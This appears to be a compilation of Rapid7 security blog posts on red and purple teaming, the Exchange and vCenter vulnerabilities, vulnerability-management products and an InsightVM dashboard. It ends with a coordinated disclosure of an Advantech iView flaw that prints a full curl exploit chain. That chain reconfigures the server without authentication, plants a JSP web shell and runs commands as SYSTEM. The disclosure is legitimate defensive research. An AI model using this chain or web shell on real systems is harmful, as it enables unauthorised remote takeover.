This is the third and final installment in our 2021 series around attack surface analysis. In part 1, I described vulnerability assessment and its value and challenges. Part 2 explored the why and how of conducting penetration testing and gave some tips on what to look for when planning an engagement. In this installment I’ll detail the final 2 analysis techniques—red and purple teaming.

Previously, we rather generically defined a red team engagement as a capabilities assessment. Time to get a little more specific with our terminology with a better definition, once again courtesy of NIST:

“A [red team is a] group of people authorized and organized to emulate a potential adversary’s attack or exploitation capabilities against an enterprise’s security posture. The Red Team’s objective is to improve enterprise cybersecurity by demonstrating the impacts of successful attacks and by demonstrating what works for the defenders (i.e., the Blue Team) in an operational environment.”

(Source: https://csrc.nist.gov/glossary/term/Red_Team)

If you’re scratching your head about now thinking “well, that sounds awfully similar to a pentest,” I’ve put together the following table to help illustrate the differences:

[Table image: differences between penetration testing and red teaming; not reproduced here.]

Additionally, like the various methodologies available for pentesting, red teams have different options in how they perform their engagements. The most common methodology that many of you have no doubt heard of is the MITRE ATT&CK framework, but there are others out there. Each of the options below has a different focus, whether it be red teaming for financial services or threat intel-based red teaming, so there is a flavor available to meet your needs:

  1. TIBER-EU—Threat Intelligence-Based Ethical Red Teaming Framework
  2. CBEST—Framework originating in the UK
  3. iCAST—Intelligence-Led Cyber Attack Simulation Testing
  4. FEER—Financial Entities Ethical Red Teaming
  5. AASE—Adversarial Attack Simulation Exercises
  6. NATO—CCDCOE red team framework

You may be thinking, “There’s no way I can stand up an internal red team, and I don’t have the budget for a professional engagement, but I would really like to test my blue team. How can I do this on my own!?” Well, you don’t have to! There are plenty of open source tools available to help you take that first step. While the following tools are nowhere near as capable or extensive as a human-led team, they do give a number of useful insights into potential weaknesses in your detection and response capabilities:

  1. APTSimulator—Batch script for Windows that makes it look as if a system were compromised
  2. Atomic Red Team—Detection tests mapped to the MITRE ATT&CK framework
  3. AutoTTP—Automated Tactics, Techniques & Procedures
  4. Blue Team Training Toolkit (BT3)—Software for defensive security training
  5. Caldera—Automated adversary emulation system by MITRE that performs post-compromise adversarial behavior within Windows networks
  6. DumpsterFire—Cross-platform tool for building repeatable, time-delayed, distributed security events
  7. Metta—Information security preparedness tool
  8. Network Flight Simulator—Utility used to generate malicious network traffic and help teams to evaluate network-based controls and overall visibility
  9. Red Team Automation (RTA)—Framework of scripts designed to allow blue teams to test their capabilities, modeled after MITRE ATT&CK
  10. RedHunt-OS—Virtual machine loaded with a number of tools designed for adversary emulation and threat hunting

Lastly, before we head into a description of purple teaming, I want to reiterate what we’ve discussed thus far. The goal of a red team engagement is not just discovering gaps in the detection and response capabilities of an organization. The purpose is to discover the blue team’s weaknesses in terms of processes, coordination, communication, etc., with the list of detection gaps being a byproduct of the engagement itself.

Purple Teaming

While the name may give away the upcoming discussion (red team + blue team = purple team), the purpose of the purple team is to enhance information sharing between both teams, not to replace or combine either team into a new entity.

  • Red Team = Tests an organization’s defensive processes, coordination, etc.
  • Blue Team = Understands attacker TTPs and designs defenses accordingly
  • Purple Team = Ensures both teams are cooperating
  • Red teams should share TTPs with the blue team
  • Blue teams should share knowledge of defensive actions with the red team

Realistically, if both of your teams are already doing this, then congratulations! You have a functional purple team. However, if you’re like me and are a fan of more form and structure, check out the illustration below:

[Illustration: purple team process; source below.]

(Source: https://github.com/DefensiveOrigins/AtomicPurpleTeam)

Seems pretty simple right? In theory it is, but in practice it gets a little more difficult (though probably not in the way you’re thinking). The biggest hurdle to effective purple teaming is helping the blue and red teams overcome the competitiveness that exists between them. Team Blue doesn’t want to give away how they catch bad guys, and Team Red doesn’t want to give away the secrets of the dark arts. By breaking down those walls you can show Blue they’re better defenders by understanding how Red operates, and Red that they can enhance their effectiveness by expanding their knowledge of defensive operations in partnership with Blue. In this way, the teams will actually want to work together (and dogs and cats will start living together, MASS HYSTERIA).

I hope the information above is helpful as you determine which analysis strategy makes sense for you! Check out the other posts in this series for more information on additional analysis techniques to take your program to the next level:

  • Part 1: Vulnerability Scanning
  • Part 2: Penetration Testing

Mass Exploitation of Exchange Server Zero-Day CVEs: What You Need to Know

Post Syndicated from Caitlin Condon original https://blog.rapid7.com/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/

Mass Exploitation of Exchange Server Zero-Day CVEs: What You Need to Know

On March 2, 2021, the Microsoft Threat Intelligence Center (MSTIC) released details on an active state-sponsored threat campaign exploiting four zero-day vulnerabilities in on-premises instances of Microsoft Exchange Server. MSTIC attributes this campaign to HAFNIUM, a group “assessed to be state-sponsored and operating out of China.”

Rapid7 detection and response teams have also observed increased threat activity against Microsoft Exchange Server since Feb. 27, 2021, and can confirm ongoing mass exploitation of vulnerable Exchange instances. Microsoft Exchange customers should apply the latest updates on an emergency basis and take immediate steps to harden their Exchange instances. We strongly recommend that organizations monitor closely for suspicious activity and indicators of compromise (IOCs) stemming from this campaign. Rapid7 has a comprehensive list of IOCs available here.

The actively exploited zero-day vulnerabilities disclosed in the MSTIC announcement as part of the HAFNIUM-attributed threat campaign are:

  • CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability in Exchange that allows an attacker to send arbitrary HTTP requests and authenticate as the Exchange server.
  • CVE-2021-26857 is an insecure deserialization vulnerability in the Unified Messaging service. Insecure deserialization is where untrusted user-controllable data is deserialized by a program. Exploiting this vulnerability gives an attacker the ability to run code as SYSTEM on the Exchange server. This requires administrator permission or another vulnerability to exploit.
  • CVE-2021-26858 is a post-authentication arbitrary file write vulnerability in Exchange. If an attacker could authenticate with the Exchange server, they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin’s credentials.
  • CVE-2021-27065 is a post-authentication arbitrary file write vulnerability in Exchange. An attacker who can authenticate with the Exchange server can use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin’s credentials.

Also included in the out-of-band update were three additional remote code execution vulnerabilities in Microsoft Exchange. These additional vulnerabilities are not known to be part of the HAFNIUM-attributed threat campaign but should be remediated with the same urgency nonetheless:

Microsoft has released out-of-band patches for all seven vulnerabilities as of March 2, 2021. Security updates are available for the following specific versions of Exchange:

  • Exchange Server 2010 (for Service Pack 3—this is a Defense in Depth update)
  • Exchange Server 2013 (CU 23)
  • Exchange Server 2016 (CU 19, CU 18)
  • Exchange Server 2019 (CU 8, CU 7)

Exchange Online is not affected.

For Rapid7 customers

InsightVM and Nexpose customers can assess their exposure to these vulnerabilities with authenticated vulnerability checks. Customers will need to perform a console restart after consuming the content update in order to scan for these vulnerabilities.

InsightIDR will generate an alert if suspicious activity is detected in your environment. The Insight Agent must be installed on Exchange Servers to detect the attacker behaviors observed as part of this attack. If you have not already done so, install the Insight Agent on your Exchange Servers.

For individual vulnerability analysis, see AttackerKB.

Building a Holistic VRM Strategy That Includes the Web Application Layer

Post Syndicated from Aaron Wells original https://blog.rapid7.com/2021/02/25/building-a-holistic-vrm-strategy-that-includes-the-web-application-layer/

Building a Holistic VRM Strategy That Includes the Web Application Layer

Building security into your overall vulnerability risk management (VRM) strategy is a must-do in the age of the all-important web app. Between security and IT-Ops teams, there are a number of steps in the VRM process, including asset identification, enumeration, prioritization, and remediation. How does application security fit in?

Co-sponsored by Forrester, a recent Rapid7 webcast expounds upon the topics discussed in this blog post. The distinguished subject-matter experts and presenters also dive deep into the nitty gritty of what it takes to get a better night’s sleep by creating a VRM strategy that extends to the application layer. Watch the webcast here, and read on for our recap below!

Web applications and APIs are assets, too

Applications are one of the most common ways attackers are getting in. In a recent survey, Forrester found that 31% of firms suffered a breach as a result of an external attack, with applications serving as one of the most common attack vectors. Along with all other assets in a VRM program, web apps must be prioritized as assets that need to be covered.

Knowing this, security leaders have started to think harder about application security. But just because it’s a top priority, does that mean it’s the company’s? Bringing stakeholders into the process early is key, because getting that application layer covered affects the entire organization. The more buy-in and support from everyone who has a stake in getting secure products to customers, the more value everyone gets from a comprehensive VRM investment.

Building security in

Buy-in comes from building in. Static Application Security Testing (SAST) is a process that can find flaws early in the life cycle of applications, providing guidance to dev teams so they can find and fix issues early in the process. Adopting SAST in the development phase means making it easier for developers to remediate as they’re coding.

Further, Software Composition Analysis (SCA) tools can help analyze the open-source libraries and third-party components that go into creating a large portion of today’s applications. A modern VRM program also needs to consider these components as assets to cover. Building these processes and tools into the Software Development Lifecycle (SDLC) will help dev teams experience fewer security flaws, get real-time education, and eventually find the ability to scale quickly.

However, as development approaches change, more and more organizations are struggling to identify and secure the sheer number of APIs built into their applications. Security teams might understandably be rushing to keep up with:

  • Identifying and cataloging APIs and endpoints
  • Assuring and managing API user identities
  • Meeting regulatory and compliance requirements        

How can security pros start thinking about baking those processes in earlier?

Understanding API security

There is no single tool for API security. A holistic approach includes identifying what sorts of APIs are out there, assessing them for organizational fit, and scanning and testing them for vulnerabilities. It also includes managing them throughout deployment and production. Does the traffic match how you expect the API to behave?

Looking at API security from the client to the backend is also key. Not only does your existing application tooling need to cover API behavior, but additional tooling may offer valuable insight into API-specific issues such as managing authentication and authorization. Remember, new development methodologies will require new security patterns.

Zoom out: What are you looking to accomplish?

When it comes to rethinking or building a sound VRM strategy, performing foundational work up front will help get organizational buy-in faster. It’ll take time to inventory everything that’s sitting at the edge, from web applications to APIs to third-party vendors. Recognizing that a significant shift will take time and being transparent about this with stakeholders can only help streamline the process. So, why invest the time?

As more people than ever before shift to a work-from-home environment, organizations may not feel as safe as they once did having corporate information residing on endpoints scattered around the city and, indeed, the world. Following along naturally to this issue is increased questioning and anxiety from cyber-insurers and auditors, particularly as it concerns things like an organization’s supply chain and partners. Much like the recent SolarWinds incident, an attack on one organization can quickly escalate into a threat against its partners.  

If you’re part of an organization beginning to engage more with your existing supply chain or validations, it’s important to remember that you are also part of their chain. So, it can be a reciprocal nature of checks and scrutiny as more partners come online. In this entire ecosystem, a good rule of thumb is to remember that exploitation has a real cost—whether the attacker’s intent is simply to disseminate sensitive data or there’s a ransom scenario afoot. Defining security frameworks and testing them against overall goals can help translate processes down into each project as well as speed up validation with a potential partner.

Extend, extend, extend

When it comes to rethinking or building a sound VRM strategy, extending that foundational security work to your web applications at the edge is a modern best practice that can yield many benefits—whether it’s protecting against someone probing for their own nefarious purposes or looking to sell that information down the line. It can also start to create an ingrained culture of taking proactive and protective steps to secure applications and the tools on which they’re built.  

For more information about broadening your VRM strategy to include the application layer, please watch our webcast with Forrester here.

VMware vCenter Server CVE-2021-21972 Remote Code Execution Vulnerability: What You Need to Know

Post Syndicated from boB Rudis original https://blog.rapid7.com/2021/02/24/vmware-vcenter-server-cve-2021-21972-remote-code-execution-vulnerability-what-you-need-to-know/

VMware vCenter Server CVE-2021-21972 Remote Code Execution Vulnerability: What You Need to Know

This blog post was co-authored by Bob Rudis and Caitlin Condon.

What’s up?

On Feb. 23, 2021, VMware published an advisory (VMSA-2021-0002) describing three weaknesses affecting VMware ESXi, VMware vCenter Server, and VMware Cloud Foundation.

Before digging into the individual vulnerabilities, it is vital that all organizations that use the HTML5 VMware vSphere Client, i.e., VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2) immediately restrict network access to those clients—especially if they are not segmented off on a management network—implement the mitigation noted below, and consider performing accelerated/immediate patching on those systems.

Vulnerability details and recommendations

CVE-2021-21972 is a critical (CVSSv3 base 9.8) unauthenticated remote code execution vulnerability in the HTML5 vSphere client. Any malicious actor with access to port 443 can exploit this weakness and execute commands with unrestricted privileges.

PT Swarm has provided a detailed walkthrough of this weakness and how to exploit it.

Rapid7 researchers have independently analyzed, tested, and confirmed the exploitability of this weakness and have provided a full technical analysis.

Proof-of-concept working exploits are beginning to appear on public code-sharing sites.

Organizations should restrict access to this plugin and patch affected systems immediately (i.e., not wait for standard patch change windows).

VMware has provided steps for a temporary mitigation, which involves disabling the plugin.

CVE-2021-21973 is an important (CVSSv3 base 8.8) heap-overflow-based remote code execution vulnerability in VMware ESXi OpenSLP. Attackers with same-segment network access to port 427 on affected systems may be able to use the heap-overflow weakness to perform remote code execution.

VMware has provided steps for a temporary mitigation, which involves disabling the SLP service on affected systems.

Rapid7 recommends applying the vendor-provided patches as soon as possible after performing the vendor-recommended mitigation.

CVE-2021-21974 is a moderate (CVSSv3 base 5.3) server-side request forgery vulnerability affecting the HTML5 vSphere Client. Attackers with access to port 443 of affected systems can use this weakness to gain access to underlying system information.

VMware has provided steps for a temporary mitigation, which involves disabling the plugin.

Since attackers will already be focusing on VMware systems due to the other high-severity weaknesses, Rapid7 recommends applying the vendor-provided patches as soon as possible after performing the vendor-recommended mitigation.

Attacker activity

Rapid7 Labs has not detected broad scanning for internet-facing VMware vCenter servers, but Bad Packets has reported that they’ve detected opportunistic scanning. We will continue to monitor Project Heisenberg for attacker activity and update this blog post as we have more information.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Take the Full-Stack Approach to Securing Your Modern Attack Surface

Post Syndicated from Aaron Wells original https://blog.rapid7.com/2021/02/19/take-the-full-stack-approach-to-securing-your-modern-attack-surface/

Take the Full-Stack Approach to Securing Your Modern Attack Surface

A growing remote-work culture demands a graduation in the approach to security. It’s time to test, monitor, secure, and extend to the application layer.

A modern methodology for vulnerability management (VM) is vital for organizations looking to minimize attack surfaces by prioritizing potential threats. This includes identifying, evaluating, treating, and reporting on security risks across key systems and the software that runs on them. An example of this full-stack approach includes broader coverage of on-premises and virtual environments, inclusive of web-application testing, and leveraging best-in-class practices and tools.

A good place to start is establishing an asset management solution. Gaining a full understanding of the vulnerabilities associated with each asset across the network is key to informing stakeholders, prioritizing vulnerabilities, and remediating issues. Due to the persisting COVID-19 pandemic, these assets are increasingly part of a growing remote workforce continuously expanding every organization’s attack surface. As assets are no longer regularly connecting to corporate networks, traditional vulnerability scans aren’t possible.

This has paved the way for agents to plug that particular vulnerability. For instance, Rapid7’s Insight Agent is lightweight data-collection software you can install on any cloud-based asset.  Let’s take a more in-depth look at modern vulnerability risk management (VRM) and what to look for in a holistic solution.

The need for speed

The COVID-19 pandemic has accelerated the evolution of security and protections for an unplanned, exponential growth in the global remote workforce. This means a faster digital transformation for every industry and organization. It means a faster pace of spinning up and scaling new apps. And it means quickening cloud adoption as IT teams scramble for accessible and reliable places to host mission-critical services. So how do we go about securing every layer in this new era of VRM?

  • Prioritizing vulnerabilities is more important than ever. Limited time and an ever-changing threat landscape make it unrealistic for teams to try and fix everything. Scrambling to do so could mean critical threats escaping through the cracks.
  • Developing strong partnerships has new meaning because, most likely, those partnerships will be virtual for the foreseeable future. Thus extra attention must be paid to maintaining them so there are more reliable eyes monitoring for vulnerabilities and ready to jump into action if a threat arises.  
  • Incorporating a full-stack approach means testing traditional and cloud infrastructure, and extends to the applications those environments host. Teams must move carefully, but also expediently when leveraging scan engines and agents to remotely monitor servers.  

With the acceleration of seemingly all security processes, it’s also important to remember to take stock of what’s working and what’s not. No matter how many fancy features, a solution is only worth the investment if it meets your organization’s unique needs and drives eventual ROI.

About that application layer

Gaining real-time understanding of an attack on your web apps provides actionable intelligence for quick remediation while providing an opportunity for a team teaching moment for the next time it happens. InsightAppSec and tCell from Rapid7 is a test-monitor-prevent solution that focuses on neutralizing vulnerabilities at the application layer.    

With guided remediation into web app flaws, you can begin building a road map for making more secure applications. You’ll start by scanning your applications in as few as five minutes so you can get visibility into the weaknesses that exist in your applications. From there, you’ll be able to view severity and remediation guidance, and share with key stakeholders to allow you to collaborate faster and scale easier. Scan on- and off-premises apps with InsightAppSec’s powerful cloud engines, accessing all of your internal and external scan configurations from a central console.

The ability to monitor more apps in more environments will be key for the future of your business, and is an extra layer of protection for vulnerabilities you can’t remediate in time. Finding solutions that include functionality to help your remediation stakeholders understand the context of the associated vulnerabilities (Attack Replay, granular remediation guidance, etc.) will allow you to partner more effectively.

An increased reliance on direct-to-cloud app deployment is a natural evolution. Benefits like higher baseline security, automated hardening, and increased flexibility are attractive. But all of that demands more time and more vigilance.

But what about the infrastructure? (People and machines)

Consider this: It’s not just about remediation, it’s also how you navigate the red tape. Grasping a more complete picture of how vulnerabilities translate to business risk is key not only for communicating those risks to higher-ups, but also maintaining and growing things like team headcount. After all, you have to have people to solve the problems. InsightVM, Rapid7’s vulnerability management solution, can help you understand and prioritize risk, with clarity.

Assume everything along your attack surface is being targeted by threat actors. These days, the reports of malicious events are coming more frequently. But covering local, remote, cloud, containerized, and virtual infrastructure is possible with InsightVM. It’s not a guaranteed catch-all solution, but it does provide the shared view and common language that can bring together traditionally siloed teams. It also paves the way for collaboration and accountability between those teams, making it easier for remediators to drive impact, celebrate progress, and improve ROI.  

With more fully supported integrations than any other VM vendor as well as the ability to automate virtually any aspect of vulnerability scanning with RESTful API, it’s now possible to get a near-complete story of the security of your infrastructure and how it affects business.

A fortified foundation

Together, InsightVM and InsightAppSec can be complementary solutions to security organizations looking to tailor or refine any on-premises, off-premises, or hybrid VRM program.  

  • Comprehensive visibility at the infrastructure layer empowers you to leverage people more efficiently.
  • Click-and-scan security testing at the application layer enables rapid return of actionable results … and peace of mind.
  • Robust reporting capabilities featured in both solutions make it easy to measure progress and report it to key stakeholders.
  • A single pane of glass is the best way to see real-time processes at work as well as the overall security status of your world.

A full-stack approach can help you secure every layer of your attack surface. Then someday, perhaps we won’t call it an “attack” surface anymore.

New InsightVM Dashboard Helps You Discover Significant Changes in Your Environment from the Past 30 Days

Post Syndicated from Dane Grace original https://blog.rapid7.com/2021/02/12/new-insightvm-dashboard-helps-you-discover-significant-changes-in-your-environment-from-the-past-30-days/

New InsightVM Dashboard Helps You Discover Significant Changes in Your Environment from the Past 30 Days

Organizations are in a constant struggle to identify and reduce risks in their constantly changing environments. These changes may manifest by several means and can be recurring events.

For example:

  1. Laptops and other devices are commissioned or decommissioned due to changes in the workforce.
  2. Your security tool discovers that assets in your environment contain several vulnerabilities recently discovered by researchers.
  3. New software or services are deployed to your organization that introduce new risk via new vulnerabilities.
  4. Your IT team deployed a round of patches to local assets, which significantly decreased the number of vulnerabilities in your environment.

The obvious challenge here is that these changes create moving targets and security teams need to quickly identify, prioritize and remediate risk as it’s introduced. We developed our Significant Changes in the Last 30 Days dashboard in InsightVM in order to provide a lens through which we can highlight the differences in your environment from the past 30 days to present day, as well as the ability to pivot the findings into a Remediation Project directly from the dashboard.

Users may easily create this dashboard by selecting the template titled “Significant Changes in the Last 30 days.” This action will create a local copy of the dashboard for you and save three new asset queries in your query library. These queries are:

  • Assets Discovered in the Last 30 Days,
  • Critical Vulnerabilities Discovered in the Last 30 Days
  • Vulnerabilities Discovered in the Last 30 Days

These queries all filter the cards on the dashboard, and we’ve added the ability to view the queries applied to this dashboard, which will allow you to further focus the findings on the dashboard.

Users are completely able to add and remove cards as they wish. However, the following cards are included in the template:

This card shows the total number of assets in your environment, as well as the total number of new assets in the past 30 days and the total percentage of increase.

Number of Critical Vulnerabilities Found in the Last 30 Days

These are the total number of vulnerabilities with a severity of “critical” found within the last 30 days of the current date.

Number of Exploitable Critical Vulnerabilities Found in the Last 30 Days

This card shows all vulnerabilities with a severity of critical and known exploits. These provide a powerful view into vulnerabilities attackers could easily exploit.

New vs. Remediated Vulnerabilities

This card shows the number and percentage of new, remediated, and unchanged vulnerability findings. This is powerful in showing which vulns in your environment have been addressed, which are new, and which have remained static.

Assets by Risk and Vulnerabilities Found in the Last 30 Days

This visualization helps you identify the riskiest assets in your environment based on the number of vulnerabilities and the associated risk score. The size of the bubbles indicates how many assets exist for a given vulnerability count and risk score range.

Vulnerabilities by CVSS Score

This card shows the vulnerabilities found in your environment in the past 30 days grouped by CVSS score range (e.g., CVSS 7.0–10).

Newly Discovered Vulnerabilities by Total Risk Score

This card allows users to leverage our Real Risk score in order to identify and prioritize vulnerabilities discovered in the past 30 days.

Assets With Actively Targeted Vulnerabilities

This card is intended to enable users to identify vulnerabilities that are actively being targeted in the wild, and therefore presenting a great degree of risk.

Assets by Number of Running Containers

This card is intended to identify risk exposure by showing container hosts and the total number of containers running on these.

Top Riskiest Assets

This card lists the riskiest assets discovered in the past 30 days, allowing teams to prioritize remediations that will help reduce risk quickly.

Most Common Software

This card shows the software most commonly used in your environment, allowing teams to prioritize their efforts on the items with the greatest surface area.

Most Common Services

This card shows the services most commonly deployed in your environment, giving you insight into which ones matter most.

New Vulnerability Findings

This card shows the total number of vulnerability findings discovered in the past 30 days, and expanding this view shows a list of them. This allows teams to identify recent vulnerabilities and prioritize them accordingly.

Remediated Vulnerability Findings

Finally, some positive news. This card demonstrates remediated vulnerabilities in the past 30 days, and this allows teams to demonstrate their progress on a monthly basis.

Per usual, users are able to arrange cards per their desires as well as share these with team members. We think this dashboard has the potential to provide deep visibility into changes in their environments and we hope this will help drive customers to a safer state.
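The cards above are all views over the same underlying data: two sets of vulnerability findings taken 30 days apart. As an added illustration (this is not InsightVM code and does not use its query language or API), the following Python computes the figures behind the “New vs. Remediated Vulnerabilities”, “Vulnerabilities by CVSS Score”, “Exploitable Critical Vulnerabilities”, and “Top Riskiest Assets” cards from two constructed snapshots. The asset names and the `EXAMPLE-0001` id are placeholders; the CVSS scores attached to the real CVE ids are the ones quoted in the advisories on this page. The “critical” threshold of CVSS 9.0 and the per-asset risk score (sum of CVSS) are assumptions made for the example, not the Real Risk score.

```python
from dataclasses import dataclass
from typing import Dict, FrozenSet, List, Tuple


@dataclass(frozen=True)
class Finding:
    """One vulnerability finding: one vulnerability observed on one asset."""
    asset: str
    vuln_id: str
    cvss: float
    exploitable: bool  # a public exploit is known for this vulnerability


# Constructed sample snapshots (not real scan output). Assets and the
# "EXAMPLE-0001" id are placeholders; the CVE scores come from the advisories.
SNAPSHOT_PREV: FrozenSet[Finding] = frozenset({
    Finding("vc-04", "CVE-2021-21972", 9.8, True),
    Finding("esx-01", "CVE-2021-21973", 8.8, False),
    Finding("esx-01", "CVE-2021-21974", 5.3, False),
    Finding("iview-01", "CVE-2021-22652", 9.8, True),
})
SNAPSHOT_NOW: FrozenSet[Finding] = frozenset({
    Finding("esx-01", "CVE-2021-21973", 8.8, False),   # unchanged
    Finding("esx-01", "CVE-2021-21974", 5.3, False),   # unchanged
    Finding("iview-01", "CVE-2021-22652", 9.8, True),  # unchanged
    Finding("iview-02", "CVE-2021-22652", 9.8, True),  # new: a second iView host
    Finding("lt-07", "EXAMPLE-0001", 4.0, False),      # new: placeholder finding
})
# vc-04 / CVE-2021-21972 is absent from SNAPSHOT_NOW, so it counts as remediated.

CRITICAL_CVSS = 9.0  # assumption: CVSS v3 "Critical" band


def diff_findings(previous: FrozenSet[Finding], current: FrozenSet[Finding]) -> Dict[str, float]:
    """Counts and percentages behind the 'New vs. Remediated' card."""
    new = current - previous
    remediated = previous - current
    unchanged = current & previous
    total = len(new) + len(remediated) + len(unchanged)

    def pct(n: int) -> float:
        return round(100.0 * n / total, 1) if total else 0.0

    return {
        "new": len(new), "remediated": len(remediated), "unchanged": len(unchanged),
        "new_pct": pct(len(new)), "remediated_pct": pct(len(remediated)),
        "unchanged_pct": pct(len(unchanged)),
    }


def cvss_bucket(score: float) -> str:
    """Map a CVSS score to the range labels used on the CVSS card."""
    if score >= 7.0:
        return "7.0-10.0"
    if score >= 4.0:
        return "4.0-6.9"
    return "0.0-3.9"


def new_by_cvss(previous: FrozenSet[Finding], current: FrozenSet[Finding]) -> Dict[str, int]:
    """Histogram of newly discovered findings by CVSS range."""
    counts: Dict[str, int] = {}
    for f in current - previous:
        counts[cvss_bucket(f.cvss)] = counts.get(cvss_bucket(f.cvss), 0) + 1
    return counts


def exploitable_critical(previous: FrozenSet[Finding], current: FrozenSet[Finding]) -> List[Tuple[str, str]]:
    """New findings that are both critical and have a known exploit: patch these first."""
    return sorted((f.asset, f.vuln_id) for f in current - previous
                  if f.exploitable and f.cvss >= CRITICAL_CVSS)


def top_riskiest_assets(current: FrozenSet[Finding]) -> List[Tuple[str, float]]:
    """Assets ranked by summed CVSS of their open findings (a stand-in for a risk score)."""
    totals: Dict[str, float] = {}
    for f in current:
        totals[f.asset] = totals.get(f.asset, 0.0) + f.cvss
    return sorted(((a, round(s, 1)) for a, s in totals.items()), key=lambda t: (-t[1], t[0]))


if __name__ == "__main__":
    print(diff_findings(SNAPSHOT_PREV, SNAPSHOT_NOW))
    print(new_by_cvss(SNAPSHOT_PREV, SNAPSHOT_NOW))
    print(exploitable_critical(SNAPSHOT_PREV, SNAPSHOT_NOW))
    print(top_riskiest_assets(SNAPSHOT_NOW))
```

Because findings are keyed by (asset, vulnerability), the same CVE appearing on a second host is correctly counted as a new finding rather than an unchanged one, which is the distinction the “New Vulnerability Findings” and “Remediated Vulnerability Findings” cards rely on.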

Not an InsightVM customer? Watch this on-demand demo to see our vulnerability risk management solution in action.

CVE-2021-22652: Advantech iView Missing Authentication RCE (FIXED)

Post Syndicated from Tod Beardsley original https://blog.rapid7.com/2021/02/11/cve-2021-22652-advantech-iview-missing-authentication-rce-fixed/

CVE-2021-22652: Advantech iView Missing Authentication RCE (FIXED)

Advantech iView versions prior to 5.7.03.6112 suffer from an instance of "CWE-306: Missing Authentication For Critical Function." This vulnerability (CVE-2021-22652) has a CVSSv3 score of 9.8, which is usually CRITICAL, since it effectively allows anyone who can connect to the iView server to run arbitrary, OS-level commands in the user context of the iView application, which is nearly always SYSTEM-level access.

Product description

Advantech iView is a proprietary, SNMP-based IoT device management application used to manage deployments of Advantech B+B SmartWorx-enabled products, as described on the vendor’s product site.

Credit

This issue was discovered by Rapid7 Senior Security Researcher William Vu. It is being disclosed in accordance with Rapid7’s vulnerability disclosure policy and in cooperation with the Industrial Control Systems Vulnerability Management and Coordination (ICS-VMC) section of the Cybersecurity and Infrastructure Security Agency (CISA), a division of the U.S. Department of Homeland Security.

Exploitation of CVE-2021-22652 (FIXED)

An unauthenticated configuration change combined with an unauthenticated file write primitive leads to an arbitrary file write that allows for remote code execution as the user running iView, which is typically NT AUTHORITY\SYSTEM. This issue was demonstrated in the vulnerable version 5.7.02.5992 and fixed in version 5.7.03.6112.

The vulnerability can be demonstrated with the following series of curl(1) commands:

Step 0: Confirm vulnerable version

This is just to confirm that we’re running a vulnerable version.

Note: Replace all instances of [RHOST] with your target IP.

wvu@kharak:~$ curl -s http://[RHOST]:8080/iView3/MenuServlet -d "page_action_type=getMenuFragment&page=version.frag" | xmllint --html --xpath 'string(//input[starts-with(@value, "Version")]/@value)' - 2> /dev/null | paste -
Version 5.7 (Build 0002.5992)
wvu@kharak:~$

Version 5.7.02.5992 is detected. This check is unauthenticated.

Step 1: Retrieve iView configuration

This is to ensure we are modifying only the values we need.

wvu@kharak:~$ curl -s http://[RHOST]:8080/iView3/NetworkServlet -d page_action_type=retrieveSystemSettings | jq -c .[0]
{"PROMPATH":"c:\\IMCTrapService\\prom_bin\\","EXPORTPATH":"c:\\IMCTrapService\\export\\","IMPORTPATH":"c:\\IMCTrapService\\import\\","CONFIGPATH":"c:\\IMCTrapService\\config\\","DBBACKUPPATH":"c:\\IMCTrapService\\backup\\","ZTPTEMPLATESPATH":"c:\\IMCTrapService\\templates\\","SSHPORT":"22","TFTPPORT":"69","MAXBACKUPFILES":"3","NETWORKSCANTIMEOUT":"20","USERSESSIONTIMEOUT":"0","USECUSTOMNAMING":"0","CUSTOMNAMETEMPLATE":""}
wvu@kharak:~$

As you can see, the configuration is returned as a JSON object.

Step 2: Update EXPORTPATH to webapps\iView3\

A relative path can be used, since the working directory is the Tomcat folder. This saves us from having to choose between C:\Program Files and C:\Program Files (x86).

wvu@kharak:~$ curl -s http://[RHOST]:8080/iView3/NetworkServlet -d 'page_action_type=updateSystemSettings&json_obj={"PROMPATH":"c:\\IMCTrapService\\prom_bin\\","EXPORTPATH":"webapps\\iView3\\","IMPORTPATH":"c:\\IMCTrapService\\import\\","CONFIGPATH":"c:\\IMCTrapService\\config\\","DBBACKUPPATH":"c:\\IMCTrapService\\backup\\","ZTPTEMPLATESPATH":"c:\\IMCTrapService\\templates\\","SSHPORT":"22","TFTPPORT":"69","MAXBACKUPFILES":"3","NETWORKSCANTIMEOUT":"20","USERSESSIONTIMEOUT":"0","USECUSTOMNAMING":"0","CUSTOMNAMETEMPLATE":""}' | jq .[0]
{
  "PROMPATH": "c:\\IMCTrapService\\prom_bin\\",
  "EXPORTPATH": "webapps\\iView3\\",
  "IMPORTPATH": "c:\\IMCTrapService\\import\\",
  "CONFIGPATH": "c:\\IMCTrapService\\config\\",
  "DBBACKUPPATH": "c:\\IMCTrapService\\backup\\",
  "ZTPTEMPLATESPATH": "c:\\IMCTrapService\\templates\\",
  "SSHPORT": "22",
  "TFTPPORT": "69",
  "MAXBACKUPFILES": "3",
  "NETWORKSCANTIMEOUT": "20",
  "USERSESSIONTIMEOUT": "0",
  "USECUSTOMNAMING": "0",
  "CUSTOMNAMETEMPLATE": ""
}
wvu@kharak:~$

The updated configuration is, again, returned as a JSON object.

Step 3: Write JSP stub to provide command execution

The JSP decodes to
<%Runtime.getRuntime().exec(request.getParameter("c"));%> and is
written to webapps\iView3\x.jsp.

wvu@kharak:~$ curl http://[RHOST]:8080/iView3/NetworkServlet -d 'page_action_type=exportInventoryTable&col_list=<%25Runtime.getRuntime().exec(request.getParameter("c"));%25>-NULL&sortname=NULL&sortorder=&filename=x.jsp'
Export failed.
wvu@kharak:~$

Note that the returned error is immaterial to the exploit (the export "failed" because the tested instance has no data to export).

Step 4: Execute arbitrary commands

You should now be able to execute arbitrary commands by sending the c parameter to the /iView3/x.jsp script.

Note: Replace [USERNAME] with your desktop user.

wvu@kharak:~$ curl http://[RHOST]:8080/iView3/x.jsp -d "c=cmd.exe /c whoami > C:\Users\[USERNAME]\Desktop\vulnerable.txt"
nul
wvu@kharak:~$

Similar to Step 3, the nul returned value is immaterial to the exploit.

Vulnerability impact

